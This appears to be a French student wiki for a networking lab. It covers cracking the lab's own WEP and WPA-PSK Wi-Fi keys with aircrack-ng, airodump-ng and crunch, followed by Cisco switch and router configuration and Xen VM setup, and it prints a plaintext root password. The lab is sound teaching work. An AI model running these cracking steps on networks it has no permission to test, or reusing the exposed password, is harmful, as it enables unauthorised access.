Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
== Securisation d'un réseau Wi-Fi ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51251</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51251"/>
				<updated>2019-11-28T09:46:24Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* TEST */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
